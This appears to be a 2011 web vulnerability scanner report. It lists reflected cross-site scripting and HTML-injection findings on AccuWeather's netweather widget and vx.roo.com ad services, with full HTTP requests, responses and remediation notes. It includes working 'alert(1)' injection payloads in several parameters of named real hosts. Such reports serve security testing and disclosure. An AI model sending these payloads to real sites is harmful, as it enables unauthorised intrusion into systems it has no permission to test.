GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell4225d"%3balert(1)//807d6220ec9&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 03:06:49 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n34 ( jfk-agg-n60), ms jfk-agg-n60 ( origin>CONN) Cache-Control: max-age=2940 Expires: Tue, 08 Feb 2011 03:55:49 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3919
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... d","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell4225d";alert(1)//807d6220ec9&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell4225d"; ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca01f"%3balert(1)//2b15cdde25d was submitted in the target parameter. This input was echoed as ca01f";alert(1)//2b15cdde25d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_selfca01f"%3balert(1)//2b15cdde25d HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 03:09:14 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n34 ( jfk-agg-n12), ms jfk-agg-n12 ( origin>CONN) Cache-Control: max-age=3540 Expires: Tue, 08 Feb 2011 04:08:14 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3919
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ] = mimeType; return ret; }
The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b0a"%3balert(1)//e6dc9c8a978 was submitted in the theme parameter. This input was echoed as c1b0a";alert(1)//e6dc9c8a978 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtbluec1b0a"%3balert(1)//e6dc9c8a978&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 03:08:28 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n34 ( jfk-agg-n33), ms jfk-agg-n33 ( origin>CONN) Cache-Control: max-age=3480 Expires: Tue, 08 Feb 2011 04:06:28 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3919
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ret.embedAttrs["type"] = mimeType; return ret; }
The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10425"%3balert(1)//7495d05b121 was submitted in the zipcode parameter. This input was echoed as 10425";alert(1)//7495d05b121 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=1000110425"%3balert(1)//7495d05b121&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 03:07:25 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n34 ( jfk-agg-n33), ms jfk-agg-n33 ( origin>CONN) Cache-Control: max-age=3360 Expires: Tue, 08 Feb 2011 04:03:26 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3919
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... uginsPage; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98db7'%3balert(1)//268143c519 was submitted in the admeld_callback parameter. This input was echoed as 98db7';alert(1)//268143c519 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK Server: IM BidManager Date: Tue, 08 Feb 2011 02:08:58 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Tue, 08-Feb-2011 02:08:38 GMT Content-Type: text/javascript Pragma: no-cache Cache-Control: no-cache Content-Length: 717
1.49. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82198<a>9dafe648ad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&82198<a>9dafe648ad3=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:20 GMT Content-Length: 1913 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 617ba<a>cdb0e19b088 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790617ba<a>cdb0e19b088 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:18 GMT Content-Length: 1907 Connection: close
1.51. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b0e2<a>32a22f94924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&7b0e2<a>32a22f94924=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:08:13 GMT Connection: close Content-Length: 20181
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload d6e5c<a>d9a3f24979b was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790d6e5c<a>d9a3f24979b HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:08:11 GMT Connection: close Content-Length: 20169
1.53. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c4c49<a>7cb1e40de21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&c4c49<a>7cb1e40de21=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:26 GMT Content-Length: 22408 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e18ca<a>6906893379b was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790e18ca<a>6906893379b HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:24 GMT Content-Length: 22396 Connection: close
1.55. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf283<a>e8b5e6bb6c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&cf283<a>e8b5e6bb6c4=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:31 GMT Content-Length: 5637 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 150c4<a>00e4e98fd41 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790150c4<a>00e4e98fd41 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:30 GMT Content-Length: 5625 Connection: close
1.57. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 375a5<a>7fe89851c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&375a5<a>7fe89851c3=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:08:03 GMT Connection: close Content-Length: 27394
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f7f5e<a>3ccf05f49f was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f7f5e<a>3ccf05f49f HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:08:02 GMT Connection: close Content-Length: 27382
1.59. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3ac06<a>42b3e8952f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&3ac06<a>42b3e8952f7=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:30 GMT Content-Length: 8814 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 24326<a>3030b9b9796 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379024326<a>3030b9b9796 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:27 GMT Content-Length: 8802 Connection: close
1.61. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 495d2<a>538293d5b25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&495d2<a>538293d5b25=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:27 GMT Content-Length: 5534 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f1f12<a>20b02dc54b6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f1f12<a>20b02dc54b6 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:25 GMT Content-Length: 5522 Connection: close
1.63. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 700ca<a>738587d8c77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&700ca<a>738587d8c77=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:44 GMT Content-Length: 1913 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f53b7<a>ee9f52a0ab8 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793f53b7<a>ee9f52a0ab8 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:43 GMT Content-Length: 1907 Connection: close
1.65. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a014e<a>6ade69e1294 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&a014e<a>6ade69e1294=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:23:22 GMT Connection: close Content-Length: 20181
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e429d<a>9a69387f93 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
